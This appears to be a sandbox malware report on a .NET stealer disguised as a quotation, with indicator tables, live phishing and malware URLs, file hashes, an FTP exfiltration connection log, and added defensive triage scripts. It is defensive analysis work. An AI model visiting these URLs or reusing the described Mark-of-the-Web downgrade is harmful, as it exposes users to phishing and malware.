api.ipify.org | 08(2)_00.exe | malicious | AgentTesla | 104.26.12.205
api.ipify.org | file.exe | malicious | Unknown | 104.26.13.205
api.ipify.org | file.exe | malicious | Unknown | 104.26.12.205
api.ipify.org | file.exe | malicious | Unknown | 104.26.12.205
api.ipify.org | file.exe | malicious | Unknown | 172.67.74.152
api.ipify.org | PO-A1702108.exe | malicious | AgentTesla, PureLog Stealer | 172.67.74.152
api.ipify.org | AvQTFKdsST.exe | malicious | DCRat, PureLog Stealer, zgRAT | 104.26.13.205
api.ipify.org | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar | 104.26.12.205
api.ipify.org | z92BankPayment38_735.exe | malicious | AgentTesla | 104.26.12.205
api.ipify.org | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar | 172.67.74.152
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENET (US) | https://trello.com/c/HA4sCE32 | malicious | HTMLPhisher | 104.18.36.155
CLOUDFLARENET (US) | https://drmerp.com/bWFpbEBrc2xhdy5jby51aw==&xBvSo7gjDRPy&hmr&x-ad-vt-unk&OC305935 | malicious | HTMLPhisher | 104.18.95.41
CLOUDFLARENET (US) | phish_alert_sp2_2.0.0.0.eml | malicious | Phisher | 104.22.72.81
CLOUDFLARENET (US) | http://arcor.cfd | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENET (US) | Message_2484922.eml | malicious | Unknown | 1.1.1.1
CLOUDFLARENET (US) | http://arcor.cfd#warszawa@psgaz.pl | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENET (US) | https://terryatchison-my.sharepoint.com/:f:/g/personal/terry_terryatchison_com_au/ElPLLTBYg_xBi3psE6F6HW0BDiAPLHOUdwoTRpPTGgsocg?e=hlVHMO | malicious | Unknown | 104.17.25.14
CLOUDFLARENET (US) | http://investmentmemo.xyz | malicious | HtmlDropper | 188.114.96.3
CLOUDFLARENET (US) | https://www.google.com.pe/url?q=Y7AzKRq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kI3xqbL8&sa=t&url=amp%2F%E2%80%8Bfc%C2%ADcid%E3%80%82io/www/%E2%80%8Brosan%C2%ADasidon%C2%ADiotri%C2%ADcologista%E2%80%8B.co%C2%ADm.%C2%ADbr/lo/lo//nJ5u8/Y21jX2FsbF9lbXBsb3llZXNfY29zdGFfcmljYUBjYXRhbGluYS5jb20=$ | malicious | HtmlDropper | 104.21.74.63
CLOUDFLARENET (US) | https://dtss.powerappsportals.com/ | malicious | Unknown | 104.18.3.157
UNIFIEDLAYER-AS-1 (US) | phish_alert_sp2_2.0.0.0.eml | malicious | Phisher | 108.179.194.43
UNIFIEDLAYER-AS-1 (US) | https://globalairt.com/arull.php?7104797967704b536932307464507a53744a4c53704a7a4d77727273784c7a7453725374524c7a732f564c3477776474594841413d3dkkirkman@ssc.nsw.gov.au | malicious | HTMLPhisher | 162.215.211.9
UNIFIEDLAYER-AS-1 (US) | Globalfoundries.com_Report_46279.pdf | malicious | HTMLPhisher | 192.185.163.42
UNIFIEDLAYER-AS-1 (US) | http://0f46b0f46b.briandrakebooks.com/ | malicious | Unknown | 192.254.234.134
UNIFIEDLAYER-AS-1 (US) | Play_VM-NowCWhiteAudiowav012.html | malicious | Tycoon2FA | 69.49.245.172
UNIFIEDLAYER-AS-1 (US) | deveba=.html | malicious | Unknown | 69.49.245.172
UNIFIEDLAYER-AS-1 (US) | Remittance_10_0224.html | malicious | HTMLPhisher | 69.49.245.172
UNIFIEDLAYER-AS-1 (US) | PO#001498.exe | malicious | FormBook | 162.240.81.18
UNIFIEDLAYER-AS-1 (US) | SKM_C257i24092511530Kaplama.pdf.exe | malicious | AgentTesla | 108.167.140.123
UNIFIEDLAYER-AS-1 (US) | DHL Shipping documents 0020398484995500.exe | malicious | AgentTesla | 192.185.13.234
Match | Associated Sample Name / URL | Detection | Threat Name | Context
- | 3b5074b1b5d032e5620f69f9f700ff0e1.cmd | malicious | Unknown | 104.26.12.205
- | 2.cmd | malicious | Unknown | 104.26.12.205
- | download_2.exe | malicious | Quasar | 104.26.12.205
- | PVUfopbGfc.exe | malicious | LummaC | 104.26.12.205
- | gp4uQBDTP8.exe | malicious | Xehook Stealer | 104.26.12.205
- | dNNMgwxY4f.exe | malicious | Xehook Stealer | 104.26.12.205
- | tYeFOUhVLd.exe | malicious | RedLine | 104.26.12.205
- | SKMBT_77122012816310TD0128_17311_XLS.vbs | malicious | Remcos | 104.26.12.205
- | Purchase Order - PO14895.vbs | malicious | Remcos | 104.26.12.205
- | GeriOdemeBildirimi942.rar.xlxs.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 104.26.12.205
                                                        No context
                                                        Process:C:\Users\user\Desktop\QUOTATIONS#08670.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1216
                                                        Entropy (8bit):5.34331486778365
                                                        Encrypted:false
                                                        SSDEEP:24:MLUE4K5E4KH1qE4x84qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHxviYHKh3oPtHo6hAHKzea
                                                        MD5:7B709BC412BEC5C3CFD861C041DAD408
                                                        SHA1:532EA6BB3018AE3B51E7A5788F614A6C49252BCF
                                                        SHA-256:733765A1599E02C53826A4AE984426862AA714D8B67F889607153888D40BBD75
                                                        SHA-512:B35CFE36A1A40123FDC8A5E7C804096FF33F070F40CBA5812B98F46857F30BA2CE6F86E1B5D20F9B6D00D6A8194B8FA36C27A0208C7886512877058872277963
                                                        Malicious:true
                                                        Reputation:moderate, very likely benign file
Preview (truncated; one record per line, CRLF-terminated):
1,"fusion","GAC",0
1,"WinRT","NotApp",1
2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0
3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0
2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0
2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0
3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0
3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0
3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
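The 1216-byte ASCII file above has the layout of a .NET Framework CLR usage log (the runtime normally writes these under %LOCALAPPDATA%\Microsoft\CLR_v4.0_32\UsageLogs\ as &lt;exe name&gt;.log; the report does not show the path): one record per assembly the process bound, with the NGEN native image path when one was used. For an incident responder this is a cheap answer to "did this .NET binary run, and what did it load": a file posing as a quotation binding System.Windows.Forms, Microsoft.VisualBasic and System.Configuration is worth a second look. The script below is an added example, not part of the Joe Sandbox report. The log text is constructed from the complete records visible in the preview (the truncated System.Xml record is omitted), and the interpretation of the leading record-kind field is an assumption stated in the code.

```python
"""Triage a .NET Framework CLR usage log (format of the dropped ASCII file above).

Added example, not part of the report. USAGE_LOG is constructed from the
report's preview; record-kind semantics are an assumption (see parse_usage_log).
"""
import csv
from typing import Dict, List

# Constructed input: the complete records from the report preview, CRLF-joined.
USAGE_LOG = "\r\n".join([
    '1,"fusion","GAC",0',
    '1,"WinRT","NotApp",1',
    '2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0',
    '3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",'
    '"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\920e3d1d70447c3c10e69e6df0766568\\System.ni.dll",0',
    '2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0',
    '2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0',
    '3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",'
    '"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\8b2c1203fd20aea8260bfbc518004720\\System.Core.ni.dll",0',
    '3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",'
    '"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\2192b0d5aa4aa14486ae08118d3b9fcc\\System.Configuration.ni.dll",0',
]) + "\r\n"

# Assemblies whose presence in a supposed "quotation" is worth a look. The
# reason text is the assembly's documented purpose, not something this log proves.
ASSEMBLIES_OF_INTEREST = {
    "System.Windows.Forms": "window and message loop (a global keyboard hook or clipboard-capturing window runs on one)",
    "Microsoft.VisualBasic": "VB runtime helpers; late-bound Interaction.CallByName calls are a common obfuscation device",
    "System.Configuration": "ConfigurationManager: reads .config files and application settings",
}


def parse_usage_log(text: str) -> List[Dict[str, str]]:
    """Return one dict per record: kind, display name, native image path, flag.

    Assumption: field 0 is a record kind. 1 = runtime settings (fusion/WinRT),
    2 = assembly bound without a native image, 3 = assembly bound to the NGEN
    image whose path follows the display name. The trailing integer is kept
    as an opaque flag. Blank lines are skipped.
    """
    records = []
    for row in csv.reader(text.splitlines()):
        if len(row) < 3:
            continue
        kind = row[0]
        rec = {"kind": kind, "name": row[1], "native_image": "", "flag": row[-1]}
        if kind == "3" and len(row) >= 4:
            rec["native_image"] = row[2]
        records.append(rec)
    return records


def loaded_assemblies(text: str) -> List[str]:
    """Simple names of the assemblies the process bound, in load order."""
    return [
        rec["name"].split(",", 1)[0]
        for rec in parse_usage_log(text)
        if rec["kind"] in ("2", "3")
    ]


def flag_assemblies(text: str) -> Dict[str, str]:
    """Map each loaded assembly of interest to why a responder cares."""
    names = set(loaded_assemblies(text))
    return {n: why for n, why in ASSEMBLIES_OF_INTEREST.items() if n in names}


if __name__ == "__main__":
    for name in loaded_assemblies(USAGE_LOG):
        print("loaded:", name)
    for name, why in flag_assemblies(USAGE_LOG).items():
        print(f"flag:   {name}: {why}")
```

Point the same functions at a real log by reading the file with `open(path, newline="")` and passing its contents; the csv module handles the quoted display names and backslash paths without any escaping configuration because the format never escapes quotes.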
                                                        Process:C:\Users\user\Desktop\QUOTATIONS#08670.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):1330176
                                                        Entropy (8bit):6.4589781784491676
                                                        Encrypted:false
                                                        SSDEEP:12288:HCC3OpHnvQoS7uwXMox9rqKiZDhYkS07bRKu0ZATyMw57+xvoKyq5L/nqF0ECD45:H33MHn4o7wXZx9rQS0/QWzgF5Qvww
                                                        MD5:B88A9908634769557E2B6396F634C4AE
                                                        SHA1:49EE7BF7463600DD8CD4B650AC0644C1A4FFB239
                                                        SHA-256:FA7D9FFD715033A0B922B2B65F1FA6DA05BB9FEAFE1432A9CC0863F7F640A3F9
                                                        SHA-512:C7188D41E7BF479CBAF0CDA3C3C2B585AFF910849D4EAF40AA80362F05268BF7EAA765CD21DD266ACEE62C121E1597EB85828C1A5323318DFF80B96810A855C8
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 24%
                                                        Reputation:low
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... .>.................:...........X... ...`....@.. ....................................`.................................8X..S....`............................................................................... ............... ..H............text....8... ...:.................. ..`.rsrc........`.......<..............@..@.reloc...............J..............@..B................pX......H...........0................1..........................................re..d.U.,....*x...kU.././...=...Kwx.f.J.&.....O.'T.....,.......!a...N.... ..0..:.[..t.:...6.W1..&...w...o.n6..-w^\....J..4..-.....).-..rWR....h."'...m.5..5if.H..H.).R...A...h..jr..&.m.r.+9.~.g....*...]|..M..Y:(?A..3.V&.2..g.d.z6.o.........t...5..o..B...K......7.;<....].&[f.\L(.~jND..:^.]UET..thZ....,...0.\......%-.6....C......+..8.m.o.$...k..[%.gE{.G.....B.TrR..X.\.0..A..ED.q?._...
                                                        Process:C:\Users\user\Desktop\QUOTATIONS#08670.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:modified
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:true
                                                        Reputation:high, very likely benign file
Preview (26 bytes: the section header, two CRLFs, then the key):
[ZoneTransfer]
ZoneId=0
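The 26-byte file above is a Zone.Identifier stream whose ZoneId is 0 (Local machine). Explorer, browsers and mail clients write ZoneId=3 (Internet) or 4 for anything they download, and that mark is what drives SmartScreen and the "this file came from another computer" prompts; rewriting it to 0 is the behaviour the overview's "Hides that the sample has been downloaded from the Internet (zone.identifier)" signature refers to. The script below is an added example, not part of the Joe Sandbox report: it parses Zone.Identifier text and classifies the mark, so a downgraded stream on an executable stands out during triage. The two sample streams are constructed (the first reproduces the report's 26 bytes exactly, the second is a typical browser-written stream with made-up URLs), and the ADS reader only works on Windows/NTFS.

```python
"""Classify the Mark-of-the-Web (Zone.Identifier) state of a file.

Added example, not part of the Joe Sandbox report. The sample streams are
constructed; SAMPLE_DOWNGRADED matches the 26-byte artifact in the report.
"""
import sys
from typing import Dict, Optional

# URLZONE values Windows writes into the ZoneId key.
ZONE_NAMES = {
    0: "Local machine",
    1: "Local intranet",
    2: "Trusted sites",
    3: "Internet",
    4: "Restricted sites",
}


def parse_zone_identifier(text: str) -> Dict[str, str]:
    """Parse the INI-style [ZoneTransfer] block into its key/value pairs.

    Blank lines (the report's file has two CRLFs after the header) and any
    other section are ignored; keys are returned with their original case.
    """
    in_section = False
    fields: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line.lower() == "[zonetransfer]"
            continue
        if in_section and "=" in line:
            key, _, value = line.partition("=")
            fields[key.strip()] = value.strip()
    return fields


def classify_motw(text: Optional[str]) -> str:
    """Return 'no-ads', 'internet', 'downgraded', 'malformed' or 'other'."""
    if text is None:
        return "no-ads"                 # no Zone.Identifier stream at all
    zone = parse_zone_identifier(text).get("ZoneId")
    if zone is None or not zone.isdigit():
        return "malformed"
    zone_id = int(zone)
    if zone_id >= 3:
        return "internet"               # the normal mark on a downloaded file
    if zone_id == 0:
        # A downloaded executable should never carry ZoneId=0. A process that
        # rewrites its own stream to 0 (as this sample does) removes the
        # SmartScreen and open-file warnings from any copy it drops later.
        return "downgraded"
    return "other"                      # intranet / trusted sites


def read_zone_identifier(path: str) -> Optional[str]:
    """Read the Zone.Identifier ADS on NTFS (Windows only); None when absent."""
    if not sys.platform.startswith("win"):
        raise OSError("alternate data streams are only readable on Windows/NTFS")
    try:
        with open(path + ":Zone.Identifier", "r", encoding="utf-8", errors="replace") as fh:
            return fh.read()
    except FileNotFoundError:
        return None


# Constructed inputs. The first is byte-identical to the report's artifact
# (14 + 2 + 2 + 8 = 26 bytes); the second is what a browser download carries,
# with made-up URLs.
SAMPLE_DOWNGRADED = "[ZoneTransfer]\r\n\r\nZoneId=0"
SAMPLE_NORMAL = (
    "[ZoneTransfer]\r\nZoneId=3\r\n"
    "ReferrerUrl=https://example.invalid/\r\n"
    "HostUrl=https://example.invalid/QUOTATIONS.exe\r\n"
)

if __name__ == "__main__":
    for label, sample in (("dropped", SAMPLE_DOWNGRADED), ("browser", SAMPLE_NORMAL)):
        zone_id = int(parse_zone_identifier(sample)["ZoneId"])
        print(f"{label}: {classify_motw(sample)} (ZoneId={zone_id}, {ZONE_NAMES[zone_id]})")
    for path in sys.argv[1:]:
        print(path, classify_motw(read_zone_identifier(path)))
```

On a live host the same check can be run across a download directory by passing paths on the command line; anything that reports "downgraded" or "no-ads" for a file the user is sure came from a browser deserves a look at which process last wrote it.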
                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Entropy (8bit):6.4589781784491676
                                                        TrID:
                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                        • DOS Executable Generic (2002/1) 0.01%
                                                        File name:QUOTATIONS#08670.exe
                                                        File size:1'330'176 bytes
                                                        MD5:b88a9908634769557e2b6396f634c4ae
                                                        SHA1:49ee7bf7463600dd8cd4b650ac0644c1a4ffb239
                                                        SHA256:fa7d9ffd715033a0b922b2b65f1fa6da05bb9feafe1432a9cc0863f7f640a3f9
                                                        SHA512:c7188d41e7bf479cbaf0cda3c3c2b585aff910849d4eaf40aa80362f05268bf7eaa765cd21dd266acee62c121e1597eb85828c1a5323318dff80b96810a855c8
                                                        SSDEEP:12288:HCC3OpHnvQoS7uwXMox9rqKiZDhYkS07bRKu0ZATyMw57+xvoKyq5L/nqF0ECD45:H33MHn4o7wXZx9rQS0/QWzgF5Qvww
                                                        TLSH:B65518E79E493115C523B77B0F279A0C975E0C1FBEE469AB488F6262E6F830D9C450C9
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... .>.................:...........X... ...`....@.. ....................................`................................
                                                        Icon Hash:443ad8d4dc581348
                                                        Entrypoint:0x53588e
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x3EDD2005 [Tue Jun 3 22:24:05 2003 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al   (the following 97 instructions are identical: the bytes after the 6-byte stub are zero, and 00 00 disassembles as this instruction)
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x135838 | 0x53 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x136000 | 0x10ccc | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x148000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x133894 | 0x133a00 | 431c49b27bff471fa8af045c1da5619a | False | 0.596332474095896 | data | 6.432758502374913 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x136000 | 0x10ccc | 0x10e00 | ce4b4bd05567e59ae0de486b9c7eae16 | False | 0.058680555555555555 | data | 3.1462721950187196 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x148000 | 0xc | 0x200 | 6c5e92b84df8fb1af014f27e241072ff | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x1360e8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2834 x 2834 px/m | - | - | 0.05199337513308885
RT_GROUP_ICON | 0x146910 | 0x14 | data | - | - | 1.25
RT_VERSION | 0x146924 | 0x3a8 | data | - | - | 0.4358974358974359
DLL | Import
mscoree.dll | _CorExeMain
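Everything in the static section above is consistent with an ordinary managed executable: the only import is mscoree.dll!_CorExeMain, the entry point is a single `jmp dword ptr [00402000h]` through the first IAT slot (Imagebase 0x400000 plus IAT RVA 0x2000), the 12-byte .reloc section is the one HIGHLOW fixup that jmp operand needs, and the CLR header sits at the COM_DESCRIPTOR directory (0x2008). Two consequences matter for triage. First, the Import Hash f34d5f2d4577ed6d9ceec516c1f5a744 is simply the MD5 of "mscoree._corexemain" and is shared by every .NET binary built this way, so it is useless for pivoting on this sample. Second, the link time 0x3EDD2005 (3 June 2003) predates the .NET 4.0 runtime whose assemblies the process binds (see the usage log above), so the stamp is synthetic (a deterministic-build hash or tampering), not a build date. The script below is an added example, not Joe Sandbox's or the report's code. The header values are copied from the report; the six stub bytes are reconstructed from the disassembled instruction, not read from the sample, and the imphash routine covers named imports only (no ordinals), which is all this file has.

```python
"""Static sanity checks on the PE header facts listed above for a .NET PE32.

Added example, not the report's or Joe Sandbox's code. Header values are
from the report; ENTRY_STUB is reconstructed from the disassembly
(FF 25 = jmp dword ptr [abs32]), not copied from the sample file.
"""
import hashlib
import struct
from datetime import datetime, timezone
from typing import List, Tuple

IMAGE_BASE = 0x400000          # Imagebase
IAT_RVA = 0x2000               # IMAGE_DIRECTORY_ENTRY_IAT
COM_DESCRIPTOR_RVA = 0x2008    # IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR (CLR header)
TIMESTAMP = 0x3EDD2005         # Time Stamp
IMPORTS = [("mscoree.dll", "_CorExeMain")]     # the only import in the table
ENTRY_STUB = b"\xff\x25\x00\x20\x40\x00"       # jmp dword ptr [00402000h]
# The Import Hash the report lists; see imphash() for why every .NET exe shares it.
GENERIC_DOTNET_IMPHASH = "f34d5f2d4577ed6d9ceec516c1f5a744"


def imphash(imports: List[Tuple[str, str]]) -> str:
    """Recompute the import hash the way pefile does for named imports:
    'lib.func' pairs, lowercased, .dll/.ocx/.sys stripped, comma-joined, MD5."""
    parts = []
    for lib, func in imports:
        lib = lib.lower()
        for ext in (".dll", ".ocx", ".sys"):
            if lib.endswith(ext):
                lib = lib[: -len(ext)]
                break
        parts.append(f"{lib}.{func.lower()}")
    return hashlib.md5(",".join(parts).encode()).hexdigest()


def decode_jmp_indirect(stub: bytes) -> int:
    """Return the absolute address an 'FF 25 disp32' indirect jmp reads through."""
    if len(stub) < 6 or stub[:2] != b"\xff\x25":
        raise ValueError("not an FF 25 (jmp dword ptr [abs32]) instruction")
    return struct.unpack_from("<I", stub, 2)[0]


def is_clr_entry_stub(stub: bytes, image_base: int, iat_rva: int) -> bool:
    """True when the entry point is the standard .NET stub: a jmp through the
    first IAT slot, which the loader fills with mscoree!_CorExeMain. Because
    the operand is an absolute VA, the linker emits exactly one HIGHLOW
    relocation for it, which is the 12-byte .reloc section in the report."""
    return decode_jmp_indirect(stub) == image_base + iat_rva


def link_time(ts: int) -> datetime:
    """PE TimeDateStamp is seconds since the Unix epoch, UTC."""
    return datetime.fromtimestamp(ts, tz=timezone.utc)


def timestamp_plausible(ts: int, is_clr: bool) -> bool:
    """A managed PE cannot predate the runtime it targets. .NET Framework 4.0
    shipped in 2010, so a CLR binary stamped 2003 carries a synthetic value
    (Roslyn deterministic builds write a hash, and packers overwrite it)."""
    t = link_time(ts)
    if is_clr and t.year < 2010:
        return False
    return t <= datetime.now(tz=timezone.utc)


def triage() -> dict:
    """Collect the checks for the values in the report."""
    is_clr = COM_DESCRIPTOR_RVA != 0 and is_clr_entry_stub(ENTRY_STUB, IMAGE_BASE, IAT_RVA)
    h = imphash(IMPORTS)
    return {
        "imphash": h,
        "imphash_is_generic_dotnet": h == GENERIC_DOTNET_IMPHASH,
        "clr_entry_stub": is_clr,
        "link_time_utc": link_time(TIMESTAMP).isoformat(),
        "timestamp_plausible": timestamp_plausible(TIMESTAMP, is_clr),
    }


if __name__ == "__main__":
    for key, value in triage().items():
        print(f"{key}: {value}")
```

For a real file, read the values with pefile (`pe.OPTIONAL_HEADER.ImageBase`, the `DATA_DIRECTORY` entries, `pe.FILE_HEADER.TimeDateStamp`, and the six bytes at `pe.get_offset_from_rva(AddressOfEntryPoint)`) and feed them to the same functions; when `imphash_is_generic_dotnet` is true, pivot on the .text MD5, the TLSH or the resource hashes instead.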
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 3, 2024 14:29:19.042311907 CEST | 62916 | 443 | 192.168.2.11 | 104.26.12.205
Oct 3, 2024 14:29:19.042368889 CEST | 443 | 62916 | 104.26.12.205 | 192.168.2.11
Oct 3, 2024 14:29:19.042443991 CEST | 62916 | 443 | 192.168.2.11 | 104.26.12.205
Oct 3, 2024 14:29:19.051403046 CEST | 62916 | 443 | 192.168.2.11 | 104.26.12.205
Oct 3, 2024 14:29:19.051417112 CEST | 443 | 62916 | 104.26.12.205 | 192.168.2.11
Oct 3, 2024 14:29:19.575258017 CEST | 443 | 62916 | 104.26.12.205 | 192.168.2.11
Oct 3, 2024 14:29:19.575402975 CEST | 62916 | 443 | 192.168.2.11 | 104.26.12.205
Oct 3, 2024 14:29:19.577789068 CEST | 62916 | 443 | 192.168.2.11 | 104.26.12.205
Oct 3, 2024 14:29:19.577800035 CEST | 443 | 62916 | 104.26.12.205 | 192.168.2.11
Oct 3, 2024 14:29:19.578082085 CEST | 443 | 62916 | 104.26.12.205 | 192.168.2.11
Oct 3, 2024 14:29:19.620659113 CEST | 62916 | 443 | 192.168.2.11 | 104.26.12.205
Oct 3, 2024 14:29:19.643815041 CEST | 62916 | 443 | 192.168.2.11 | 104.26.12.205
Oct 3, 2024 14:29:19.687398911 CEST | 443 | 62916 | 104.26.12.205 | 192.168.2.11
Oct 3, 2024 14:29:19.759422064 CEST | 443 | 62916 | 104.26.12.205 | 192.168.2.11
Oct 3, 2024 14:29:19.759588957 CEST | 443 | 62916 | 104.26.12.205 | 192.168.2.11
Oct 3, 2024 14:29:19.759659052 CEST | 62916 | 443 | 192.168.2.11 | 104.26.12.205
Oct 3, 2024 14:29:19.769767046 CEST | 62916 | 443 | 192.168.2.11 | 104.26.12.205
Oct 3, 2024 14:29:21.063005924 CEST | 62917 | 21 | 192.168.2.11 | 192.254.225.136
Oct 3, 2024 14:29:21.074860096 CEST | 21 | 62917 | 192.254.225.136 | 192.168.2.11
Oct 3, 2024 14:29:21.074970961 CEST | 62917 | 21 | 192.168.2.11 | 192.254.225.136
Oct 3, 2024 14:29:21.078624010 CEST | 62917 | 21 | 192.168.2.11 | 192.254.225.136
Oct 3, 2024 14:29:21.086905956 CEST | 21 | 62917 | 192.254.225.136 | 192.168.2.11
Oct 3, 2024 14:29:21.086966038 CEST | 62917 | 21 | 192.168.2.11 | 192.254.225.136
Oct 3, 2024 14:29:21.107405901 CEST | 62918 | 21 | 192.168.2.11 | 192.254.225.136
Oct 3, 2024 14:29:21.112906933 CEST | 21 | 62918 | 192.254.225.136 | 192.168.2.11
Oct 3, 2024 14:29:21.112999916 CEST | 62918 | 21 | 192.168.2.11 | 192.254.225.136
Oct 3, 2024 14:29:21.717237949 CEST | 21 | 62918 | 192.254.225.136 | 192.168.2.11
Oct 3, 2024 14:29:21.717547894 CEST | 62918 | 21 | 192.168.2.11 | 192.254.225.136
Oct 3, 2024 14:29:21.751313925 CEST | 21 | 62918 | 192.254.225.136 | 192.168.2.11
Oct 3, 2024 14:29:22.051707983 CEST | 21 | 62918 | 192.254.225.136 | 192.168.2.11
Oct 3, 2024 14:29:22.055375099 CEST | 62918 | 21 | 192.168.2.11 | 192.254.225.136
Oct 3, 2024 14:29:22.070780039 CEST | 21 | 62918 | 192.254.225.136 | 192.168.2.11
Oct 3, 2024 14:29:22.325660944 CEST | 21 | 62918 | 192.254.225.136 | 192.168.2.11
Oct 3, 2024 14:29:22.325845957 CEST | 62918 | 21 | 192.168.2.11 | 192.254.225.136
